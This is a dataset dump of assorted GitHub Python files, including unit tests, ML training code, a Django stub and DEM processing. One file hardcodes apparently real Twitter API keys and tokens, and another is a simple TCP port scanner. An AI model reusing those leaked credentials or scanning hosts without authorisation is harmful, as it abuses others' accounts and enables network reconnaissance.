blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 2 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 69 | license_type stringclasses 2 values | repo_name stringlengths 5 118 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringlengths 4 63 | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 2.91k 686M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 23 values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 220 values | src_encoding stringclasses 30 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 2 10.3M | extension stringclasses 257 values | content stringlengths 2 10.3M | authors listlengths 1 1 | author_id stringlengths 0 212 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
8c650db903e4c481af2d57614db70fd99846e0d2 | 6ebb264379c41c8e22bf89bb482d56de1a2f2e50 | /tests/unit/test_sum.py | fe4cc3aa315276e8d4f493317f4ece75063ae710 | [] | no_license | axen22/unitTest3 | 864cce48660312398db3546382375f720e74b7ac | 38b9e7b37941def9c8a90665107b87a6579925a2 | refs/heads/master | 2020-07-28T07:04:10.491348 | 2019-09-18T15:43:33 | 2019-09-18T15:43:33 | 209,346,149 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 783 | py | #another way to do this
#target = __import__("my_sum.py")
#sum = target.sum
import unittest
from fractions import Fraction
from my_sum import sum
class TestSum(unittest.TestCase):
def test_list_int(self):
"""
Test that it can sum a list of integers
"""
data = [1, 2, 3]
result = sum(data)
self.assertEqual(result, 6)
def test_list_fraction(self):
"""
Test that it can sum a list of fractions
"""
data = [Fraction(1, 4), Fraction(1, 4), Fraction(2, 4)]
result = sum(data)
self.assertEqual(result, 1)
def test_bad_type(self):
data = "banana"
with self.assertRaises(TypeError):
result = sum(data)
if __name__ == '__main__':
unittest.main() | [
"53572480+axen22@users.noreply.github.com"
] | 53572480+axen22@users.noreply.github.com |
c2fd4c3fec6f8deacabcdb8e6a1f219e8f2805bd | a20f21f0737002e3fb3e8345c42f2f46aaefab7d | /Weather Report/TwitterToMongo.py | 558b800e0079be39bccb42359abeb41838cac9c4 | [] | no_license | akokaz1/PMG | 22a5c2dad1d38de013f73b314365e01890aeddff | a9db139d728765ef6c03140eba2f2c6861b37e91 | refs/heads/master | 2021-01-20T07:57:00.178171 | 2016-12-02T14:46:46 | 2016-12-02T14:46:46 | 68,720,702 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,955 | py | from twython import TwythonStreamer
from pymongo import MongoClient
client = MongoClient()
db = client.twitter
tweets = db.twitterdata
tweeter = []
class MyStreamer(TwythonStreamer):
def on_success(self, data):
if data ['lang'] == 'en':
tweeter.append(data)
tweets.insert(data)
print 'recieved tweet #', len(tweeter)
if len(tweeter)>= 3000:
self.disconnect()
def on_error(self,status_code, data):
print status_code, data
self.disconnect()
stream = MyStreamer('eAL497dT5hjs2bHLh1mRoR3cj', 'HUuqoidPWbT04QPpZfFHwpqvLvq6IxOU1kOa2eRRZf8Rh5XmtE',
'775365291555651584-hhpeCLC8VY2ccOoeWxXge6cWbamKhBG',
'zzlkNqY4eaxCZ738GXhcTPmQf2L9RkO6uZot93a2ZJoF7')
stream.statuses.filter(track='london avalanche\
,london balmy\
,london black ice\
,london blizzard\
,london blustery\
,london breeze\
,london cloud\
,london cloudy\
,london cold\
,london condensation\
,london dew\
,london downburst\
,london downpour\
,london drizzle\
,london drought\
,london dry\
,london flood\
,london fog\
,london forecast\
,london freeze\
,london freezing\
,london frost\
,london gale\
,london gust\
,london gustnado\
,london hail\
,london haze\
,london heat\
,london heatwave\
,london humid\
,london humidity\
,london hurricane\
,london ice\
,london icicle\
,london lightning\
,london mist\
,london muggy\
,london overcast\
,london permafrost\
,london rain\
,london rainbands\
,london rainbow\
,london sandstorm\
,london sleet\
,london slush\
,london smog\
,london snow\
,london snowstorm\
,london storm\
,london summer\
,london sunrise\
,london sunset\
,london temperature\
,london thaw\
,london thunder\
,london thunderstorm\
,london tropical\
,london visibility\
,london warm\
,london weather\
,london wind\
,london winter')
#tweets.insert_many(tweeter)
| [
"alikokaz@live.co.uk"
] | alikokaz@live.co.uk |
d705d8ae5e78e993dd20c7d1b1c4e43f687428c5 | 490ed3946708791a188c6f375b1986ba1fb7d386 | /build/lib/keras_bert_ner/utils/.ipynb_checkpoints/predict-checkpoint.py | 3efcaa50da311647a86771cd08b39325e51e3874 | [
"MIT"
] | permissive | gm19900510/keras-bert-ner | 123c40487b5a20d6be49b1d808a832ccd3d2a489 | 6b37b23623544e7e1ec59a0b12ac92bff2b69182 | refs/heads/master | 2020-09-01T12:11:13.456500 | 2019-10-31T09:50:24 | 2019-10-31T09:50:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,697 | py | # -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import codecs
import pickle
import numpy as np
from keras.models import load_model
from ..bert4keras.layers import custom_objects
from ..bert4keras.utils import Tokenizer
from ..decode.viterbi import Viterbi
from keras_contrib.layers import CRF
from keras_contrib.losses import crf_loss
from keras_contrib.metrics import crf_viterbi_accuracy
__all__ = ["build_trained_model", "get_model_inputs"]
custom_objects["CRF"] = CRF
custom_objects["crf_loss"] = crf_loss
custom_objects["crf_viterbi_accuracy"] = crf_viterbi_accuracy
def build_trained_model(args):
if args.device_map != "cpu":
os.environ["CUDA_VISIBLE_DEVICES"] = args.device_map
else:
os.environ["CUDA_VISIBLE_DEVICES"] = ""
token_dict = {}
with codecs.open(args.bert_vocab, "r", encoding="utf-8") as f:
for line in f:
token = line.strip()
token_dict[token] = len(token_dict)
tokenizer = Tokenizer(token_dict)
model = load_model(os.path.join(args.model_path, args.model_name), custom_objects=custom_objects)
with codecs.open(os.path.join(args.model_path, "id2tag.pkl"), "rb") as f:
id2tag = pickle.load(f)
viterbi_decoder = Viterbi(model, len(id2tag))
return tokenizer, id2tag, viterbi_decoder
def get_model_inputs(tokenizer, src_data, max_len):
tokens, segs = [], []
for item in src_data:
res = tokenizer.encode(item, first_length=max_len)
tokens.append(np.array(res[0]))
segs.append(np.array(res[1]))
return tokens, segs | [
"liushaoweihua@yiwise.com"
] | liushaoweihua@yiwise.com |
46e7c0ebfd167b48434b11d94b7ebaa0bb8cb136 | 2cad173dd3d6a378d805592eb71ce7261d5c3f98 | /Get Files From Directory Dynamically.py | 2c2c91a352b777dfe8c93333dd85c599f1ac5526 | [] | no_license | souravbanerjeewb/Code | b4ae2fd2d1157d98c5d01ad2c2e3fe5758f0a17e | bd1bcdc06a4b1a03c067cf34aeb6ae5000dc8732 | refs/heads/master | 2023-01-04T08:10:24.710146 | 2020-10-27T17:25:15 | 2020-10-27T17:25:15 | 112,154,810 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 221 | py | import glob, os
#*****Define the directory******
os.chdir("D:/Files")#***Change the directory as requered
#*****Loop to get the txt files and display the name
for file in glob.glob("*.txt"):
print(file)
| [
"noreply@github.com"
] | souravbanerjeewb.noreply@github.com |
65aad1bfe5b4d4756f2c8145c69dbdeaceda54b0 | 061fbd9e1d9bed1c88d5660211e9172401d5c108 | /venv/bin/easy_install | e3a56dc6a003370abaaa757ad43060e0d5c2f3fd | [] | no_license | PrachiJani13/mypythonproject | 5838302f1b9dd433dd9daf248f51d012072f7eaf | 3aa81e5d1175f4f369e49eb0faee046ee1668b1c | refs/heads/master | 2020-09-17T11:08:07.125757 | 2019-11-26T02:35:00 | 2019-11-26T02:35:00 | 224,083,299 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 277 | #!/Users/prachijani/workspace/myprojectpython/venv/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from setuptools.command.easy_install import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"prachi.jani@sjsu.edu"
] | prachi.jani@sjsu.edu | |
ab8659e73eca39e44cbcc460da6ce495f4024307 | 1b8ffe50059dff352206da41d40a6cab12744864 | /PortScanner.py | cc6cd65670f145625b93d510c0c9d7f1efcc60bc | [] | no_license | XD-Coffin/PortScanner | f4bca444a98115aee5eaa6e11e7b77f23a069ab7 | 299e3947ee0fc84c3af80370498fe357f1aabe60 | refs/heads/master | 2022-12-20T08:58:47.745548 | 2020-10-20T00:41:31 | 2020-10-20T00:41:31 | 305,545,491 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 754 | py | import socket
import sys
import os
import time
os.system("color a")
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
host = input("Enter the host's ip address you want to scan: ")
print("""
1. Specific Port
2. All 1000 Ports
""")
option = int(input("Enter the option you want to use: "))
if option == 1:
port = int(input("Enter the port: "))
if s.connect_ex((host,port)):
print(f"Port {port} is closed")
else:
print(f"{port} Port is open")
elif option == 2:
for port in range(1000):
if s.connect_ex((host,port)):
print(f'Port {port} is closed')
else:
print(f"{port} Port is open")
port+=1
# print("Coded by Sahil Singh.")
time.sleep(6)
sys.exit()
| [
"np01nt4a190175@islingtoncollege.edu.np"
] | np01nt4a190175@islingtoncollege.edu.np |
e98c9e6e4e8e98f0eb86148a6604600fbb0f969e | f445450ac693b466ca20b42f1ac82071d32dd991 | /generated_tempdir_2019_09_15_163300/generated_part002645.py | 26c00d84fbe342c060edabef02fe3c69582a4427 | [] | no_license | Upabjojr/rubi_generated | 76e43cbafe70b4e1516fb761cabd9e5257691374 | cd35e9e51722b04fb159ada3d5811d62a423e429 | refs/heads/master | 2020-07-25T17:26:19.227918 | 2019-09-15T15:41:48 | 2019-09-15T15:41:48 | 208,357,412 | 4 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,821 | py | from sympy.abc import *
from matchpy.matching.many_to_one import CommutativeMatcher
from matchpy import *
from matchpy.utils import VariableWithCount
from collections import deque
from multiset import Multiset
from sympy.integrals.rubi.constraints import *
from sympy.integrals.rubi.utility_function import *
from sympy.integrals.rubi.rules.miscellaneous_integration import *
from sympy import *
class CommutativeMatcher122210(CommutativeMatcher):
_instance = None
patterns = {
0: (0, Multiset({}), [
(VariableWithCount('i2.2.1.2.1.0', 1, 1, None), Mul),
(VariableWithCount('i2.2.1.2.1.0_1', 1, 1, S(1)), Mul)
]),
1: (1, Multiset({0: 1}), [
(VariableWithCount('i2.2.1.2.1.0', 1, 1, S(1)), Mul)
])
}
subjects = {}
subjects_by_id = {}
bipartite = BipartiteGraph()
associative = Mul
max_optional_count = 1
anonymous_patterns = set()
def __init__(self):
self.add_subject(None)
@staticmethod
def get():
if CommutativeMatcher122210._instance is None:
CommutativeMatcher122210._instance = CommutativeMatcher122210()
return CommutativeMatcher122210._instance
@staticmethod
def get_match_iter(subject):
subjects = deque([subject]) if subject is not None else deque()
subst0 = Substitution()
# State 122209
if len(subjects) >= 1 and isinstance(subjects[0], Pow):
tmp1 = subjects.popleft()
subjects2 = deque(tmp1._args)
# State 123779
if len(subjects2) >= 1:
tmp3 = subjects2.popleft()
subst1 = Substitution(subst0)
try:
subst1.try_add_variable('i2.2.1.2.1.1', tmp3)
except ValueError:
pass
else:
pass
# State 123780
if len(subjects2) >= 1:
tmp5 = subjects2.popleft()
subst2 = Substitution(subst1)
try:
subst2.try_add_variable('i2.2.1.2.1.2', tmp5)
except ValueError:
pass
else:
pass
# State 123781
if len(subjects2) == 0:
pass
# State 123782
if len(subjects) == 0:
pass
# 0: x**n
yield 0, subst2
subjects2.appendleft(tmp5)
subjects2.appendleft(tmp3)
subjects.appendleft(tmp1)
return
yield
from collections import deque | [
"franz.bonazzi@gmail.com"
] | franz.bonazzi@gmail.com |
002d43df6b57bde48d6fb3e45f4ec7e76b5e5901 | bf0b6a4973f2c565e71fb3c0171ee2039464fa55 | /duckietown_rl/vae.py | abd23b158ece8ca81ee87d15f51cc7233499e464 | [] | no_license | duckieT/duckietown_rl_ddpg_vae | d891d5dc15bc05fbe2c0e5f4281beb363c660de1 | 739210584fb9a4028887a3e2d420a1b3686952b1 | refs/heads/master | 2020-04-18T06:42:09.426461 | 2018-11-14T06:03:19 | 2018-11-14T06:03:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,592 | py | from __future__ import print_function
import torch
from torch import nn, optim
from torch .nn import functional as F
from torchvision .utils import save_image
import numpy as np
# hyperparameters
input_image_size = (480, 640)
input_image_channels = 3
image_dimensions = input_image_channels * input_image_size [0] * input_image_size [1]
feature_dimensions = 1000
encoding_dimensions = 40
learning_rate = 1e-3
# test hyperparameters
test_reconstruction_n = 8
test_sample_n = 8
def thing ():
class thing (dict):
def __init__(self):
pass
def __getattr__(self, attr):
return self [attr]
def __setattr__(self, attr, val):
self [attr] = val
return thing ()
def params ():
import argparse
import os
import sys
parser = argparse .ArgumentParser (description = 'vae x ducks')
parser .add_argument ('--train', type = str, required = True, metavar = 'path', help = 'path to a folder containing training images for the vae')
parser .add_argument ('--test', type = str, default = None, metavar = 'path', help = 'path to a folder containing test images for the vae (default: training dataset)')
parser .add_argument ('--init', type = str, default = None, metavar = 'path', help = 'path to a trained model file for initializing training')
parser .add_argument ('--learning-rate', type = float, default = learning_rate, metavar = 'n', help = 'learning rate for adam (default: ' + str (learning_rate) + ')')
parser .add_argument ('--feature-dim', type = int, default = feature_dimensions, metavar = 'd', help = 'number of feature dimonsions (default: ' + str (feature_dimensions) + ')')
parser .add_argument ('--encoding-dim', type = int, default = encoding_dimensions, metavar = 'd', help = 'number of encoding dimensions (default: ' + str (encoding_dimensions) + ')')
parser .add_argument ('--batch-size', type = int, default = 10, metavar = 'n', help = 'batch size for training (default: 10)')
parser .add_argument ('--epochs', type = int, default = 10, metavar = 'n', help = 'number of epochs to train (default: 10)')
parser .add_argument ('--activation', type = str, default = 'relu', choices = ['relu', 'leaky_relu', 'selu'], metavar = 'a', help = 'activation function in the hidden layers (default: relu)')
parser .add_argument ('--log-interval', type = int, default = 10, metavar = 's', help = 'how many batches to wait before logging training status (default: 10)')
parser .add_argument ('--seed', type = int, default = 1, metavar = 's', help = 'random seed (default: 1)')
parser .add_argument ('--no-cuda', action = 'store_true', default = False, help = 'disables CUDA training')
parser .add_argument ('--out', type = str, default = None, metavar = 'path', help = 'path to a folder to store output')
parser .add_argument ('--out-model', action = 'store_true', default = False, help = 'output model_n.pt')
args = parser .parse_args ()
trainer_args = thing ()
trainer_args .train = args .train
trainer_args .test = args .test or args .train
trainer_args .learning_rate = args .learning_rate
trainer_args .batch_size = args .batch_size
trainer_args .epochs = args .epochs
trainer_args .log_interval = args .log_interval
trainer_args .seed = args .seed
trainer_args .cuda = not args .no_cuda and torch .cuda .is_available ()
trainer_args .init = args .init
trainer_args .out = args .out
trainer_args .out_model = args .out_model
model_args = thing ()
model_args .feature_dimensions = args .feature_dim
model_args .encoding_dimensions = args .encoding_dim
model_args .activation = args .activation
os .makedirs (trainer_args .out, exist_ok = True)
if os .listdir (trainer_args .out):
print ('Warning: ' + trainer_args .out + ' is not empty!', file = sys .stderr)
return trainer_args, model_args
def load_samples (path, cuda = True):
import os
import tempfile
from torch .utils .data import DataLoader
from torchvision import datasets, transforms
image_folder_path = tempfile .TemporaryDirectory () .name
os .makedirs (image_folder_path)
os .symlink (os .path .realpath (path), os .path .join (image_folder_path, 'data'))
cuda_args = {'num_workers': 1, 'pin_memory': True} if trainer_args .cuda else {}
return DataLoader (
dataset = datasets .ImageFolder (image_folder_path, transform = transforms .ToTensor ()),
batch_size = trainer_args .batch_size,
shuffle = True,
**cuda_args)
def out_file (filename):
import os
return os .path .join (trainer_args .out, filename)
def load_state ():
return torch .load (trainer_args .init) if trainer_args .init else {}
def save_state ():
torch .save ((
{ 'epoch': epoch
, 'rng': torch .get_rng_state ()
, 'model': model .state_dict ()
, 'optimizer': optimizer .state_dict () })
, out_file ('state_' + str (epoch) + '.pt'))
if trainer_args .out_model:
torch .save ({ 'model': model .state_dict () }
, out_file ('model_' + str (epoch) + '.pt'))
class VAE (nn .Module):
def __init__ (self, image_dimensions, feature_dimensions, encoding_dimensions, activation, **kwargs):
super (VAE, self) .__init__ ()
self .activation = activation
self.img_dim = image_dimensions
self.feat_dim = feature_dimensions
self.encode_dim = encoding_dimensions
self .fc1 = nn .Linear (image_dimensions, feature_dimensions)
self .fc21 = nn .Linear (feature_dimensions, encoding_dimensions)
self .fc22 = nn .Linear (feature_dimensions, encoding_dimensions)
self .fc3 = nn .Linear (encoding_dimensions, feature_dimensions)
self .fc4 = nn .Linear (feature_dimensions, image_dimensions)
self.device = torch .device ('cuda' if torch.cuda.is_available() else 'cpu')
def encode (self, x):
if(type(x) is np.ndarray):
x = x.reshape(-1, self.img_dim)
x = torch.from_numpy(x).type(torch.FloatTensor).to(self.device)
else:
x = x.view(-1, self.img_dim)
if self .activation == 'relu':
h1 = F .relu (self .fc1 (x))
elif self .activation == 'leaky_relu':
h1 = F .leaky_relu (self .fc1 (x))
elif self .activation == 'selu':
h1 = F .selu (self .fc1 (x))
else:
raise Exception ('unknown activation', self .activation)
return self .fc21 (h1), self .fc22 (h1)
def reparameterize (self, mu, logvar):
std = torch .exp (0.5 * logvar)
eps = torch .randn_like (std)
return eps .mul (std) .add_ (mu)
def decode (self, z):
if self .activation == 'relu':
h3 = F .relu (self .fc3 (z))
elif self .activation == 'leaky_relu':
h3 = F .leaky_relu (self .fc3 (z))
elif self .activation == 'selu':
h3 = F .selu (self .fc3 (z))
else:
raise Exception ('unknown activation', self .activation)
return torch .sigmoid (self .fc4 (h3))
def forward (self, x):
if(type(x) is np.ndarray):
x = x.reshape(-1, self.img_dim)
x = torch.from_numpy(x).type(torch.FloatTensor).to(self.device)
else:
x = x.view(-1, self.img_dim)
mu, logvar = self .encode (x)
z = self .reparameterize (mu, logvar)
return self .decode (z), mu, logvar
# Reconstruction + KL divergence losses summed over all elements and batch
def objective (recon_x, x, mu, logvar):
BCE = F .binary_cross_entropy (recon_x, x .view (-1, image_dimensions), reduction = 'sum')
# see Appendix B from VAE paper:
# Kingma and Welling. Auto-Encoding Variational Bayes. ICLR, 2014
# https://arxiv.org/abs/1312.6114
# 0.5 * sum (1 + log (sigma^2) - mu^2 - sigma^2)
KLD = -0.5 * torch .sum (1 + logvar - mu .pow (2) - logvar .exp ())
return BCE + KLD
def train (epoch):
model .train ()
total_train_loss = 0
for i, (batch_sample, _) in enumerate (train_sampler):
batch_sample = batch_sample .to (device)
optimizer .zero_grad ()
recon_batch, mu, logvar = model (batch_sample)
loss = objective (recon_batch, batch_sample, mu, logvar)
loss .backward ()
total_train_loss += loss .item ()
optimizer .step ()
if i % trainer_args .log_interval == 0:
print ('Train Epoch: {} [{}/{} ({:.0f}%)]\tLoss: {:.6f}' .format
( epoch
, i * len (batch_sample)
, len (train_sampler .dataset)
, 100. * i / len (train_sampler)
, loss .item () / len (batch_sample)))
train_loss = total_train_loss / len (train_sampler .dataset)
print ('====> Epoch: {} Average loss: {:.4f}' .format (epoch, train_loss))
def test (epoch):
model .eval ()
total_test_loss = 0
with torch .no_grad ():
for i, (batch_sample, _) in enumerate (test_sampler):
batch_sample = batch_sample .to (device)
recon_batch, mu, logvar = model (batch_sample)
total_test_loss += objective (recon_batch, batch_sample, mu, logvar) .item ()
if trainer_args .out and i == 0:
test_batch_size = min (batch_sample .size (0), trainer_args .batch_size)
n = min (test_batch_size, test_reconstruction_n)
comparison = torch .cat (
[ batch_sample [:n]
, recon_batch .view (test_batch_size, input_image_channels, input_image_size [0], input_image_size [1]) [:n] ])
save_image (comparison .cpu (), out_file ('reconstruction_' + str (epoch) + '.png'), nrow = n)
test_loss = total_test_loss / len (test_sampler .dataset)
print ('====> Test set loss: {:.4f}' .format (test_loss))
if trainer_args .out:
encoding_sample = torch .randn (test_sample_n ** 2, model_args .encoding_dimensions) .to (device)
image_sample = model .decode (encoding_sample) .cpu ()
save_image (image_sample .view (test_sample_n ** 2, input_image_channels, input_image_size [0], input_image_size [1])
, out_file ('sample_' + str (epoch) + '.png'))
"""
trainer_args, model_args = params ()
torch .manual_seed (trainer_args .seed)
train_sampler = load_samples (trainer_args .train, trainer_args .cuda)
test_sampler = load_samples (trainer_args .test, trainer_args .cuda)
device = torch .device ('cuda' if trainer_args .cuda else 'cpu')
model = VAE (**model_args) .to (device)
optimizer = optim .Adam (model .parameters (), lr = trainer_args .learning_rate)
epoch_offset = 1
state = load_state ()
if 'rng' in state:
torch .set_rng_state (state ['rng'])
if 'model' in state:
model .load_state_dict (state ['model'])
if 'optimizer' in state:
optimizer .load_state_dict (state ['optimizer'])
if 'epoch' in state:
epoch_offset += state ['epoch']
for epoch in range (epoch_offset, epoch_offset + trainer_args .epochs):
train (epoch)
test (epoch)
if trainer_args .out:
save_state ()
"""
| [
"richielyl@hotmail.com"
] | richielyl@hotmail.com |
4db5502b3cb8b1723df8a7ac89467e02e213fda7 | d83f50302702d6bf46c266b8117514c6d2e5d863 | /counting-bits.py | f875bfed4d8a2d111f435b9c52cfced316a0c179 | [] | no_license | sfdye/leetcode | 19764a6bdb82de114a2c82986864b1b2210c6d90 | afc686acdda4168f4384e13fb730e17f4bdcd553 | refs/heads/master | 2020-03-20T07:58:52.128062 | 2019-05-05T08:10:41 | 2019-05-05T08:10:41 | 137,295,892 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 250 | py | class Solution:
def countBits(self, num):
"""
:type num: int
:rtype: List[int]
"""
ones = [0] * (num + 1)
for i in range(1, num + 1):
ones[i] = ones[i & (i - 1)] + 1
return ones
| [
"tsfdye@gmail.com"
] | tsfdye@gmail.com |
4f0d5c22413bdaacf869bf9cbd12d47bcc73f375 | 1dc753d68b234b10193962f58d306bd91957eb6d | /college/college/doctype/student_achievements/student_achievements.py | 66884338ed30206d53469c0ed0ba413e759ab9c7 | [
"MIT"
] | permissive | harshith187/college | e8612134e47c48ad721840f684362f7348e9bad4 | d9ae21734dcde70397aead827e57fbbdcdeb98c9 | refs/heads/master | 2020-07-20T12:36:27.601134 | 2020-05-25T13:53:57 | 2020-05-25T13:53:57 | 206,641,495 | 0 | 4 | NOASSERTION | 2020-05-25T15:05:16 | 2019-09-05T19:27:37 | Python | UTF-8 | Python | false | false | 266 | py | # -*- coding: utf-8 -*-
# Copyright (c) 2019, mvit ise and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
# import frappe
from frappe.model.document import Document
class StudentAchievements(Document):
pass
| [
"frappe@ubuntu.vm"
] | frappe@ubuntu.vm |
10b624301331e971b74b1e971ab0f51ee36867b2 | 30bc1657a930cb90902a36c9e7e16e5d31ae2341 | /processDEM.py | dc3e54b92ab043e2dc05f0ffeec6c562a8882b1b | [] | no_license | Jubeku/DEM_processing | 26918dc620d216ebcd4ab9cbeb6763e87669c0fc | 0577dd5939ec4ea93bcada5faac6690feb8c0044 | refs/heads/master | 2020-08-26T16:59:03.106098 | 2019-10-29T16:01:04 | 2019-10-29T16:01:04 | 217,081,467 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,548 | py | #!/usr/bin/env python
"""
This script allows to repair, filter, and crop 2d DEM files.
Input parameters have to be specified in a file named 'input.txt'.
"""
import numpy as np
from modules.classTopo import Topo
from modules.m_PLOTS import plotDEM
def main():
### INPUT
# Read input parameter
with open('input.txt') as f:
lines = f.readlines()
k1, k2 = map(np.float,lines[1].split())
E0out, E1out = map(np.float,lines[3].split())
N0out, N1out = map(np.float,lines[5].split())
dxout, dyout = map(np.float,lines[7].split())
repair_bool = lines[ 9].replace('\n', '')
fileID = lines[11].replace('\n', '')
outID = lines[13].replace('\n', '')
# Read DEM file
with open(fileID) as f:
lines = f.readlines()
Nx, Ny = map(np.int,lines[1].split())
E0, E1 = map(np.float,lines[2].split())
N0, N1 = map(np.float,lines[3].split())
tmin,tmax = map(np.float,lines[4].split())
topo = np.loadtxt(lines,skiprows=5)
# Determine resolution of DEM file
dx = (E1-E0)/(Nx-1)
dy = (N1-N0)/(Ny-1)
xi = np.arange(0, dx*Nx+dx, dx)
yi = np.arange(0, dy*Ny+dy, dy)
print('\n Grid dimension and resolution.')
print('Nx: ', Nx, ', Ny: ', Ny)
print('dx: ', dx, ', dy: ', dy)
# Creat object with Topo class
topo = np.flipud(topo)
topoC = Topo(topo, E0, N0, dx, dy, Nx, Ny)
### PROCESSING
# Filtering
if k1 == 0.:
print('\n No filtering.')
else:
topoC.filter( k1, k2 )
# Cropping
if ( E0out == E0 and E1out == E1 and N0out == N0 and N1out == N1 ):
print('\n No cropping.')
else:
topoC.crop( E0out, E1out, N0out, N1out )
# Interpolating
if ( dxout == dx and dyout == dy ):
print('\n No interpolation.')
else:
topoC.interpolate( dxout, dyout )
# Repairing
if repair_bool == 'True':
topoC.repair()
### PLOTTING
topoC.plot( 'Processed DEM' )
### WRITING
with open(outID, 'w') as f:
f.write('DSAA\n')
f.write(' '+str(topoC.Nx)+' '+str(topoC.Ny)+'\n')
f.write(' '+str(E0out)+' '+str(E1out)+'\n')
f.write(' '+str(N0out)+' '+str(N1out)+'\n')
np.savetxt(f,(np.min(topoC.topo),np.max(topoC.topo)),
fmt=' %.1f',newline='')
f.write('\n')
np.savetxt(f, np.flipud(topoC.topo), fmt='%.3f', delimiter=' ')
if __name__ == "__main__":
main()
| [
"julian.b.kuehnert@gmail.com"
] | julian.b.kuehnert@gmail.com |
18993d6a9980af00334c5b5db42135f52700e93a | 925f9291b8d98468f17ff8b8e5d54006193ddcd0 | /bookstore/urls.py | 36c6e936740001e428aba08ea0fa667cda50af5b | [] | no_license | hamzabelatra/DjangoBookStore | 7c058469acef22228463580f6c343cb591e626eb | 5cbffd37bd093a497d18c131b532256cee19b2d9 | refs/heads/master | 2023-08-09T11:10:11.895251 | 2021-09-20T20:18:50 | 2021-09-20T20:18:50 | 408,589,362 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 751 | py | """bookstore URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path
urlpatterns = [
path('admin/', admin.site.urls),
]
| [
"hamzabelatra1@gmail.com"
] | hamzabelatra1@gmail.com |
1253ef78db264c7b83bead8bbc79f13fb57fd0b9 | 2bdf073b9788c446342643296c6b68c353b0a5c6 | /rareapi/views/tag.py | eab977834ef18b2af0bd99de48da0dfffcf18616 | [] | no_license | nss-day-cohort-50/rare-api-rowdy-roadtrippers | f07819362a97b0b02d945c9e932ecf18375c01ea | 25122375b4f07b738a65c4bac21ff300379d831b | refs/heads/main | 2023-09-03T12:57:04.390337 | 2021-11-18T17:34:05 | 2021-11-18T17:34:05 | 428,313,351 | 0 | 0 | null | 2021-11-18T17:34:06 | 2021-11-15T15:14:38 | Python | UTF-8 | Python | false | false | 1,501 | py | from django.core.exceptions import ValidationError
from rest_framework import status
from django.http import HttpResponseServerError
from rest_framework.viewsets import ViewSet
from rest_framework.response import Response
from rest_framework import serializers
from rareapi.models import Tag
class TagView(ViewSet):
def create(self, request):
try:
tag = Tag.objects.create(
label = request.data["label"]
)
serializer = TagSerializer(tag, context={"request": request})
return Response(serializer.data)
except ValidationError as ex:
return Response({"reason": ex.message}, status=status.HTTP_400_BAD_REQUEST)
def list(self, request):
tag = Tag.objects.all()
serializer = TagSerializer(
tag, many=True, context={'request': request})
return Response(serializer.data)
def destroy(self, request, pk=None):
try:
tag = Tag.objects.get(pk=pk)
tag.delete()
return Response({}, status=status.HTTP_204_NO_CONTENT)
except tag.DoesNotExist as ex:
return Response({'message': ex.args[0]}, status=status.HTTP_404_NOT_FOUND)
except Exception as ex:
return Response({'message': ex.args[0]}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
class TagSerializer(serializers.ModelSerializer):
class Meta:
model = Tag
fields = ('id', 'label')
depth = 1
| [
"matthew.singler@gmail.com"
] | matthew.singler@gmail.com |
d0e81ba6dd79dc29f6b5cd9958451e5b589b5712 | 66c723d0137c0de9fdfc4a90d3405a8b3c60a7bd | /n_step_lstm/n_step_lstm.py | cc632b6a6ca0f68a32b0e7c8f828d8f30373bd32 | [] | no_license | afcarl/test-chainer-performance | 5ccb1d451791dd96633a1bb0f7e9438688f006ad | e0802e8421f4a07b839c44ceb90cfdf188ec4b84 | refs/heads/master | 2020-03-16T11:27:36.202733 | 2017-02-21T07:21:45 | 2017-02-21T07:21:45 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,796 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Toy sequence auto-encoder built from stateless Chainer LSTMs: encode a
# batch of variable-length sequences, then decode them one time-slice at a
# time.  Python 2 syntax (print statements).
import chainer
import numpy as np
# Keep the sequences sorted by length, longest first (required by
# chainer.functions.transpose_sequence).  [translated from Japanese]
x1 = chainer.Variable(np.array([0, 1, 2, 3, 4], dtype=np.int32))
x2 = chainer.Variable(np.array([4, 5, 6], dtype=np.int32))
x3 = chainer.Variable(np.array([4, 5], dtype=np.int32))
x_data = [x1, x2, x3]
batchsize = len(x_data)
x_dataset = chainer.functions.transpose_sequence(x_data)
# Auto-encoder case: the targets are the inputs themselves.  [translated]
y_data = x_data[:]
y_dataset = chainer.functions.transpose_sequence(y_data)
vocab_size = 2000
n_units = 200
embedding_size = 200
